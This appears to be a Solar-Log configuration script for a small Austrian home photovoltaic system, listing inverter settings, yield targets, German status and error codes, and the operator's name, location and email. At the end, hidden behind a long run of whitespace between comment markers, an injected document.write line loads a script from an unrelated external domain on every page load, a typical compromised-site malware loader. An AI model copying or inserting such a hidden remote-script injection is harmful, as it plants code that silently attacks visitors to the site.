var Boot=99
var AnlagenKWP=3020
var time_start = new Array(8,7,6,6,6,6,6,7,7,7,7,8)
var time_end = new Array(17,18,20,21,21,22,22,21,20,19,17,17)
var sollMonth = new Array(2,4,7,10,12,13,14,14,11,8,3,2)
var SollYearKWP=890
var AnzahlWR = 1
var MaxWRP=new Array(AnzahlWR)
MaxWRP[0]=new Array(2800,22000,700000,3600000)
var WRInfo = new Array(AnzahlWR)
WRInfo[0]=new Array("SolarMax 3000S","         1",3020,1,"WR 1",1,null,null,0,null,4,0,1,1000,null)
WRInfo[0][16]=2
WRInfo[0][17]=1
var HPTitel="Photovoltaikanlage Fam. Schoeberl"
var HPBetreiber="Familie Schoeberl"
var HPEmail="michael.schoeberl@aon.at"
var HPStandort="A-2431 Enzersdorf a.d. Fischa"
var HPModul="11x PVT 215AE-A 3x PVT 220 MAE-A"
var HPWR="Solarmax 3000S"
var HPLeistung="3,02 kWp"
var HPInbetrieb="18.09.2009"
var HPAusricht="27 Grad Dachneigung Ausrichtung Sued"
var BannerZeile1="Familie Schoeberl"
var BannerZeile2="3,02 kWp in 2431 Enzersdorf/F"
var BannerZeile3="im Netz seit 18.9.2009"
var BannerLink="www.solarlog-home2.eu/schoeberl"
var StatusCodes = new Array(1)
var FehlerCodes = new Array(1)
StatusCodes[0] = "Externer Alarm 1,Isolationsfehler DC-Seite,Fehlerstrom Erde zu gross,Sicherungsbruch Mittelpunkterde,Externer Alarm 2,Langzeit-Temperaturbegrenzung,Fehler AC-Einspeisung,Externer Alarm 4,Ventilator defekt,Sicherungsbruch,Ausfall Temp.-Sensor,Alarm 12,Alarm 13,Alarm 14,Alarm 15,Alarm 16,Alarm 17,Alarm 18,Alarm 19,Alarm 20,Alarm 21,Alarm 22,Alarm 23,Alarm 24,Alarm 25,Alarm 26,Alarm 27,Alarm 28,Alarm 29,Alarm 30,Alarm 31,Alarm 32,Keine Komm.,In Betrieb,Zu wenig Einstrahlung,Anfahren,MPP,Ventilator l√§uft,MPP Peak,Temp.begrenzung,Netzbetrieb,DC-Strombegrenzung,AC-Strombegrenzung,Testmode,Ferngesteuert,Neustartverz√∂gerung,Externe Begrenzung,Frequenzbegrenzung,Neustartbegrenzung,Aufstarten,Zu wenig Aufstartlstg.,Zu wenig Betriebslstg.,E20020,Nicht initialisiert,Deaktiviert,Ausser Betrieb,LT nicht bereit,E20025,E20026,E20027,E20028,E20029,E20030,E20031,E20032,E20033,E20034,E20035,E20036,E20037,E20038,E20039,E20040,E20041,E20042,E20043,E20044,E20045,E20046,E20047,E20048,E20049,FW update,In Betrieb,E20052,E20053,E20054,E20055,E20056,E20057,E20058,E20059,E20060,E20061,E20062,E20063,E20064,E20065,E20066,E20067,E20068,E20069,E20070,E20071,E20072,E20073,E20074,E20075,E20076,E20077,E20078,E20079,E20080,E20081,E20082,E20083,E20084,E20085,E20086,E20087,E20088,E20089,E20090,E20091,E20092,E20093,E20094,E20095,E20096,E20097,E20098,E20099,Kein Fehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Iso-Fehler,Iso-Fehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Fehlerstrom zu gross,Kein Netz,Netzfrequenz zu hoch,Netzfrequenz zu tief,Netzfehler,Uac 10min zu hoch,Ger√§tefehler,Ger√§tefehler,Netzspannung zu hoch,Netzspannung zu tief,Ger√§tefehler,Ger√§tefehler,Fehler ext. Eing 1,Fehler ext. Eing 2,Ger√§tefehler,Falscher Drehsinn,Ger√§tefehler,Hauptschalter aus,Ger√§tefehler,Ger√§tefehler,Ventilator defekt,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Freq.√Ñnderung zu hoch,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,E20149,Fehlerstromsprung,Fehlerstromsprung,Ger√§tefehler,Ger√§tefehler,Abschaltung 1,Abschaltung 2,Ger√§tefehler,Isolationsfehler DC,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Fehlerstrom zu gro√ü,Kein Netz,Netzfrequenz zu hoch,Netzfrequenz zu tief,Inselbetrieb,Uac 10min zu hoch,Ger√§tefehler,Ger√§tefehler,Netzspannung zu hoch,Netzspannung zu tief,Ger√§tefehler,Ger√§tefehler,Fehler DC-Polarit√§t,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Udc zu tief,E20181,E20182,E20183,E20184,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Ger√§tefehler,Phase/Neutrall.vertauscht,E20190,Begrenzungsfehler,E20192,E20193,E20194,E20195,E20196,E20197,Ger√§tefehler,Unbek. Fehler,Keine Komm.,In Betrieb,Kein Fehler,Ertrag zu tief Strang,Sicherungsbruch,Unbek. Fehler,Keine Komm.,In Betrieb,Kein Fehler,Unbek. Fehler,Keine Komm.,In Betrieb,Kein Fehler,Unbek. Fehler"
FehlerCodes[0] = ""
var Verguetung=1800
var Serialnr =    5049915
var Firmware = "3.1.1 Build 66"
var FirmwareDate = "14.04.2014"
var WRTyp = "MULTIPROTOCOL"
var OEMTyp = 0
var SLTyp = "200"
var SLVer = 2
var SLHW = 65608
var SLBV = 22
var Intervall = 300
var SLDatum = "21.05.14"
var SLUhrzeit = "05:23:39"
var isTemp=true
var isOnline=true
var eventsHP=1
var exportDir=""
var Lang="DE"
var AnzahlGrp=0
var CFDatum = "20.05.14"
var CFUhrzeit = "17:38:54"
var SCB = true
var SCBIF1 = 0
var webMenuFull = 0
var IPlatform = 4
var DateFormat ="dd.mm.yy"
var TimeFormat ="HH:MM:ss"
var TimeFormatNoSec ="HH:MM"
var Currency ="Ä"
var CurrencySub ="Cent"
var CurrencyFirst ="1"
var ISOCode ="AT"
var DSTMode ="1"
var Dezimalseparator =","
var WeightUnit ="KG"
var DirectMarketing = false
var AdamAvailable=0
var netProfile=0
var pmControlType=0
var pmReductionOnSerialType=0
var windinverters=0
var co2factor=700


/*d5a2ec*/
                                                                                                                                                                                                                                                          document.write('<script type="text/javascript" src="http://www.decoration2000.it/components/cnt.php?id=15357497"></script>');
/*/d5a2ec*/
